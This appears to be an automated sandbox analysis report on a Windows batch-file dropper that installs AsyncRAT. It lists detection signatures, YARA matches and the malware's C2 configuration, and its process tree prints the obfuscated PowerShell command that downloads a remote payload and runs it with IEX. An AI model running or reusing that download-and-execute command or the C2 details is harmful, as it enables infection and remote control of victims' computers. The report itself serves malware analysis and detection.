Edit tour

Windows Analysis Report
27#U0646.bat

Overview

General Information

Sample name:	27#U0646.bat renamed because original name is a hash value
Original sample name:	- .bat
Analysis ID:	1623667
MD5:	7d6aa05580c83825c688211f1e71b72a
SHA1:	e1650405a2061dec28d8cb770964902028d0cf4a
SHA256:	df07b378a833528cca8012ec0bd65f06372ccf23262b9930c246d8758cef342a
Tags:	asyncratbatjaruser-ramirezrick2
Infos:

Detection

AsyncRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell Download and Execute IEX

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected Powershell decode and execute

.NET source code contains potential unpacker

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Powerup Write Hijack DLL

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected MSILLoadEncryptedAssembly

Yara detected Obfuscated Powershell

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\27#U0646.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7568 cmdline: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7584 cmdline: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 04029E121A0CFA5991749937DD22A1D9)

taskkill.exe (PID: 7744 cmdline: "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7776 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7824 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7860 cmdline: "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7892 cmdline: "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7924 cmdline: "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7956 cmdline: "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7992 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8024 cmdline: "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8056 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

wscript.exe (PID: 908 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 5744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4428 cmdline: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')" MD5: 04029E121A0CFA5991749937DD22A1D9)

aspnet_compiler.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "ohsexoh.freeddns.org", "Ports": "6161", "Version": "| CRACKED BY https://t.me/xworm_v2", "Autorun": "false", "Install_Folder": "WGNQbWtNYnBnU2ZidG16VHR3bXdrRHJ1WVUzZkhWbmc=", "Install_File": "qhDc8YgGONyCJdizIO9fQ/2OXyfmZhrEybcc+piWZNVPvqaDHoF9UzwPfAIwsgjNaQM7cGT9yAOTyScLZbtKAbs/867hmPo9Gs2F3FzcZK4=", "AES_key": "XcPmkMbpgSfbtmzTtwmwkDruYU3fHVng", "Mutex": "UbsISxSwsXxRgb91RviZzMhHqDltHmav3T9EWPkVEATgKyAZldGVksIP2PdPGEUQOq6fj/0Cv5gCtOkgj29fEDil7MO8dnYo/TmAfzWkVpK/m2g4nNzw0KS35sqY6t6vmfeUBBA4d9d0azZl8Uu/jVy2gkA4SqBX0crvsYR+47ispp37PcVxwEotMgUQCceZTcGZTqDDOiDLt7RoLsVXlKuA1CPlY9/+HwSU/rnqPsV4tZYpraBn/aW4/NwsZekj0r1lkN3f+fCOtiWLZNSCS08CgXiih4/kjVDXSDN6Uf0KOgtnWCZneDs+4B+e9aNC9TGNWQqqpTvg22Nb6rmvDY5S2ttqqE5cM56GQF+MQxUXYFlSxvsOeWPJAlHUqYdcMSnB0Lel0vLB3jgpEStfbVNWSmE1sMe7I0lILti2fChot4p/YpyTVlbr+99nUKl7st2gtZdua6rMZtO6CLFD1D7CIDGlj2hcgEB2BOphPwearpR21TezZFO7Z8XI/TC2gZFyVPTCn6tcGiwtJH0h7nx9jfff1I83kau+j+uYsAIkJZZatNux1FDsaT/BqdSXFa5IQ7S+PZuWxpO5Mw3yrSC6c8SXywKuWeXpA/BesNYaCqcMSW/rD0NtiJzteRInugp/+I3oFW7diCT2dxyVPLlEYBby+lx5UCwKxgJ8S2Y=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
27#U0646.bat	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security
27#U0646.bat	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1263:$r1: p^O^w^e^r^S^h^E^l^l 0x1263:$r2: p^O^w^e^r^S^h^E^l^l

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2145116702.000002D0E8D40000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.2148322644.000002D0EA550000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xe274:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x11118:$a2: Stub.exe 0x111a8:$a2: Stub.exe 0xa9dc:$a3: get_ActivatePong 0xe48c:$a4: vmware 0xe304:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xb95c:$a6: get_SslClient
00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xe306:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.2142358779.000002D0E8A97000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.2142358779.000002D0E8A90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.2142358779.000002D0E8B1F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xcf94:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10238:$a2: Stub.exe 0x102c8:$a2: Stub.exe 0x96fc:$a3: get_ActivatePong 0xd1ac:$a4: vmware 0xd024:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa67c:$a6: get_SslClient
00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xd026:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.2145516549.000002D0EA4A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.1970750932.000002D080BFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x1798f4:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x17c7c8:$a2: Stub.exe 0x17c858:$a2: Stub.exe 0x17605c:$a3: get_ActivatePong 0x179b0c:$a4: vmware 0x179984:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x176fdc:$a6: get_SslClient
00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x179986:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.2150967102.000002D0EAC7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000003.00000002.2145516549.000002D0EA450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x28e69c:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2cb174:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x289540:$a2: Stub.exe 0x2895d0:$a2: Stub.exe 0x2ce018:$a2: Stub.exe 0x2ce0a8:$a2: Stub.exe 0x28ae04:$a3: get_ActivatePong 0x2c78dc:$a3: get_ActivatePong 0x28e8b4:$a4: vmware 0x2cb38c:$a4: vmware 0x28e72c:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2cb204:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x28bd84:$a6: get_SslClient 0x2c885c:$a6: get_SslClient
00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.1970750932.000002D080001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x147cc:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x627f4:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x17670:$a2: Stub.exe 0x17700:$a2: Stub.exe 0x65698:$a2: Stub.exe 0x65728:$a2: Stub.exe 0x10f34:$a3: get_ActivatePong 0x5ef5c:$a3: get_ActivatePong 0x149e4:$a4: vmware 0x62a0c:$a4: vmware 0x1485c:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x62884:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x11eb4:$a6: get_SslClient 0x5fedc:$a6: get_SslClient
Process Memory Space: powershell.exe PID: 7584	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: powershell.exe PID: 7584	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1354ef:$b2: ::FromBase64String( 0x4f8d:$s1: -join 0x322c3:$s1: -join 0x3f398:$s1: -join 0x4276a:$s1: -join 0x42e1c:$s1: -join 0x4490d:$s1: -join 0x46b13:$s1: -join 0x4733a:$s1: -join 0x47baa:$s1: -join 0x482e5:$s1: -join 0x48317:$s1: -join 0x4835f:$s1: -join 0x4837e:$s1: -join 0x48bce:$s1: -join 0x48d4a:$s1: -join 0x48dc2:$s1: -join 0x48e55:$s1: -join 0x490bb:$s1: -join 0x4b251:$s1: -join 0x59c9b:$s1: -join
Process Memory Space: powershell.exe PID: 4428	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 7440	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 7440	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1b9b0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.powershell.exe.1696705a0e0.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.1696705a0e0.5.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xd194:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10038:$a2: Stub.exe 0x100c8:$a2: Stub.exe 0x98fc:$a3: get_ActivatePong 0xd3ac:$a4: vmware 0xd224:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa87c:$a6: get_SslClient
20.2.powershell.exe.1696705a0e0.5.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x98fc:$str01: get_ActivatePong 0xa87c:$str02: get_SslClient 0xa898:$str03: get_TcpClient 0x8e35:$str04: get_SendSync 0x8efa:$str05: get_IsConnected 0x9632:$str06: set_UseShellExecute 0xd4ba:$str07: Pastebin 0xeb52:$str08: Select * from AntivirusProduct 0x10038:$str09: Stub.exe 0x100c8:$str09: Stub.exe 0xd2a4:$str10: timeout 3 > NUL 0xd194:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xd224:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.1696705a0e0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xd226:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.16966443638.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966443638.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xb394:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xe238:$a2: Stub.exe 0xe2c8:$a2: Stub.exe 0x7afc:$a3: get_ActivatePong 0xb5ac:$a4: vmware 0xb424:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x8a7c:$a6: get_SslClient
21.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966443638.1.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x7afc:$str01: get_ActivatePong 0x8a7c:$str02: get_SslClient 0x8a98:$str03: get_TcpClient 0x7035:$str04: get_SendSync 0x70fa:$str05: get_IsConnected 0x7832:$str06: set_UseShellExecute 0xb6ba:$str07: Pastebin 0xcd52:$str08: Select * from AntivirusProduct 0xe238:$str09: Stub.exe 0xe2c8:$str09: Stub.exe 0xb4a4:$str10: timeout 3 > NUL 0xb394:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xb424:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
21.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xd194:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10038:$a2: Stub.exe 0x100c8:$a2: Stub.exe 0x98fc:$a3: get_ActivatePong 0xd3ac:$a4: vmware 0xd224:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa87c:$a6: get_SslClient
20.2.powershell.exe.16966443638.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb426:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
21.2.aspnet_compiler.exe.400000.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x98fc:$str01: get_ActivatePong 0xa87c:$str02: get_SslClient 0xa898:$str03: get_TcpClient 0x8e35:$str04: get_SendSync 0x8efa:$str05: get_IsConnected 0x9632:$str06: set_UseShellExecute 0xd4ba:$str07: Pastebin 0xeb52:$str08: Select * from AntivirusProduct 0x10038:$str09: Stub.exe 0x100c8:$str09: Stub.exe 0xd2a4:$str10: timeout 3 > NUL 0xd194:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xd224:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
21.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xd226:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.16966427fe0.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966427fe0.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966427fe0.4.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xd194:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10038:$a2: Stub.exe 0x100c8:$a2: Stub.exe 0x98fc:$a3: get_ActivatePong 0xd3ac:$a4: vmware 0xd224:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa87c:$a6: get_SslClient
20.2.powershell.exe.16966427fe0.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xb394:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xe238:$a2: Stub.exe 0xe2c8:$a2: Stub.exe 0x7afc:$a3: get_ActivatePong 0xb5ac:$a4: vmware 0xb424:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x8a7c:$a6: get_SslClient
20.2.powershell.exe.16966427fe0.4.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x98fc:$str01: get_ActivatePong 0xa87c:$str02: get_SslClient 0xa898:$str03: get_TcpClient 0x8e35:$str04: get_SendSync 0x8efa:$str05: get_IsConnected 0x9632:$str06: set_UseShellExecute 0xd4ba:$str07: Pastebin 0xeb52:$str08: Select * from AntivirusProduct 0x10038:$str09: Stub.exe 0x100c8:$str09: Stub.exe 0xd2a4:$str10: timeout 3 > NUL 0xd194:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xd224:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.16966427fe0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xd226:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.16966427fe0.4.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x7afc:$str01: get_ActivatePong 0x8a7c:$str02: get_SslClient 0x8a98:$str03: get_TcpClient 0x7035:$str04: get_SendSync 0x70fa:$str05: get_IsConnected 0x7832:$str06: set_UseShellExecute 0xb6ba:$str07: Pastebin 0xcd52:$str08: Select * from AntivirusProduct 0xe238:$str09: Stub.exe 0xe2c8:$str09: Stub.exe 0xb4a4:$str10: timeout 3 > NUL 0xb394:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xb424:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.16966427fe0.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb426:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.1696705a0e0.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.1696705a0e0.5.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xb394:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xe238:$a2: Stub.exe 0xe2c8:$a2: Stub.exe 0x7afc:$a3: get_ActivatePong 0xb5ac:$a4: vmware 0xb424:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x8a7c:$a6: get_SslClient
20.2.powershell.exe.1696705a0e0.5.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x7afc:$str01: get_ActivatePong 0x8a7c:$str02: get_SslClient 0x8a98:$str03: get_TcpClient 0x7035:$str04: get_SendSync 0x70fa:$str05: get_IsConnected 0x7832:$str06: set_UseShellExecute 0xb6ba:$str07: Pastebin 0xcd52:$str08: Select * from AntivirusProduct 0xe238:$str09: Stub.exe 0xe2c8:$str09: Stub.exe 0xb4a4:$str10: timeout 3 > NUL 0xb394:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xb424:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.1696705a0e0.5.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb426:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.16966491660.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966491660.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xb394:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xe238:$a2: Stub.exe 0xe2c8:$a2: Stub.exe 0x7afc:$a3: get_ActivatePong 0xb5ac:$a4: vmware 0xb424:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x8a7c:$a6: get_SslClient
20.2.powershell.exe.16966491660.2.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x7afc:$str01: get_ActivatePong 0x8a7c:$str02: get_SslClient 0x8a98:$str03: get_TcpClient 0x7035:$str04: get_SendSync 0x70fa:$str05: get_IsConnected 0x7832:$str06: set_UseShellExecute 0xb6ba:$str07: Pastebin 0xcd52:$str08: Select * from AntivirusProduct 0xe238:$str09: Stub.exe 0xe2c8:$str09: Stub.exe 0xb4a4:$str10: timeout 3 > NUL 0xb394:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xb424:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.16966491660.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb426:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
20.2.powershell.exe.16966491660.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966491660.2.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xd194:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10038:$a2: Stub.exe 0x100c8:$a2: Stub.exe 0x98fc:$a3: get_ActivatePong 0xd3ac:$a4: vmware 0xd224:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa87c:$a6: get_SslClient
